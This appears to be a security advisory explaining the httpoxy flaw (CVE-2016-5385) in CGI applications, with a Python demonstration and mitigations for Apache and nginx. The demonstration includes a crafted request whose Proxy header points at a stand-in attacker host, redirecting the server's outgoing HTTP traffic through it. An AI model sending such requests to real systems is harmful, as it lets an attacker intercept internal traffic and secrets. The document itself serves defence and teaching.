CVE-2016-5385: Vulnerability in CGI applications
httpoxy is a set of vulnerabilities that affect application code running in CGI or CGI-like environments. It comes down to a simple namespace conflict: the CGI RFC puts the HTTP Proxy header from a request into the environment as HTTP_PROXY, and HTTP_PROXY is also a popular environment variable used to configure an outgoing proxy. A remote client can therefore choose the proxy used by any outgoing HTTP request the application makes while handling that request, redirecting the traffic to a host the client controls, which makes the issue remotely exploitable.
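The following is an added, self-contained illustration of the mechanism described above; it is not code from the advisory or from any affected project. It reproduces the CGI header-to-environment mapping on a constructed request carrying a Proxy header, shows how a naive proxy-aware HTTP client would then honour the attacker's value, and contrasts two mitigations: scrubbing HTTP_PROXY at the gateway, and having the client ignore HTTP_PROXY whenever it is running under CGI (REQUEST_METHOD is set). The request, host names and helper names are all invented for the example.

```python
"""Added example (not from the advisory): how CGI turns a client-supplied "Proxy"
header into HTTP_PROXY, how a proxy-aware client picks it up, and two mitigations.
Every request, host and helper name here is constructed for illustration."""
import re
from typing import Dict, Optional

# Constructed request: the client sends a "Proxy" header, which no client or
# standard legitimately uses. Case does not matter, as shown below.
ATTACK_REQUEST = (
    "GET /cgi-bin/app.py HTTP/1.1\r\n"
    "Host: victim.example\r\n"
    "proxy: http://attacker.example:8080\r\n"
    "User-Agent: curl/7.64.1\r\n"
    "\r\n"
)


def parse_request_headers(raw: str) -> Dict[str, str]:
    """Minimal HTTP/1.1 request-head parser: returns {header-name: value}."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip()] = value.strip()
    return headers


def cgi_meta_variable(header_name: str) -> str:
    """CGI's header-to-meta-variable rule: prefix HTTP_, upper-case, '-' becomes '_'.
    There is no reserved-name check, so "Proxy" in any case becomes HTTP_PROXY."""
    return "HTTP_" + header_name.upper().replace("-", "_")


def build_cgi_env(raw: str) -> Dict[str, str]:
    """Simulate what a CGI gateway hands the script: request line fields plus HTTP_*."""
    method, target, _version = raw.split("\r\n", 1)[0].split(" ", 2)
    env = {"REQUEST_METHOD": method, "REQUEST_URI": target, "GATEWAY_INTERFACE": "CGI/1.1"}
    for name, value in parse_request_headers(raw).items():
        env[cgi_meta_variable(name)] = value
    return env


def resolve_proxy_naive(env: Dict[str, str], url: str) -> Optional[str]:
    """Pre-httpoxy behaviour of many HTTP clients: for http:// URLs, honour HTTP_PROXY
    from the environment regardless of where that environment came from."""
    if url.lower().startswith("http://"):
        return env.get("HTTP_PROXY") or env.get("http_proxy")
    return None


def resolve_proxy_hardened(env: Dict[str, str], url: str) -> Optional[str]:
    """Client-library mitigation: under CGI (REQUEST_METHOD is set) HTTP_PROXY is
    attacker-controllable, so ignore it; outside CGI an operator-set proxy still works."""
    if "REQUEST_METHOD" in env:
        return None
    return resolve_proxy_naive(env, url)


def scrub_cgi_env(env: Dict[str, str]) -> Dict[str, str]:
    """Gateway-side mitigation: drop HTTP_PROXY before the application sees it,
    equivalent to unsetting the Proxy request header at the front-end web server."""
    return {k: v for k, v in env.items() if k.upper() != "HTTP_PROXY"}


def exploitable(env: Dict[str, str], url: str) -> bool:
    """True when an outgoing request to `url` made from this CGI environment would be
    routed through a proxy that the remote client chose."""
    return "REQUEST_METHOD" in env and resolve_proxy_naive(env, url) is not None


if __name__ == "__main__":
    env = build_cgi_env(ATTACK_REQUEST)
    target = "http://api.internal/orders"
    print("HTTP_PROXY seen by the script:", env.get("HTTP_PROXY"))
    print("naive client proxy:   ", resolve_proxy_naive(env, target))
    print("hardened client proxy:", resolve_proxy_hardened(env, target))
    print("scrubbed env proxy:   ", resolve_proxy_naive(scrub_cgi_env(env), target))
```

Two things the example makes visible: the header name is case-folded, so blocking only "Proxy" while letting "proxy" or "PROXY" through is not a fix, and the client-side check must not simply ignore HTTP_PROXY everywhere, because outside CGI that variable is a legitimate operator setting. In practice the gateway-side scrub is done at the web server, for example with Apache mod_headers (RequestHeader unset Proxy early) or by overriding the variable in the nginx FastCGI configuration (fastcgi_param HTTP_PROXY ""), so that the application never receives it.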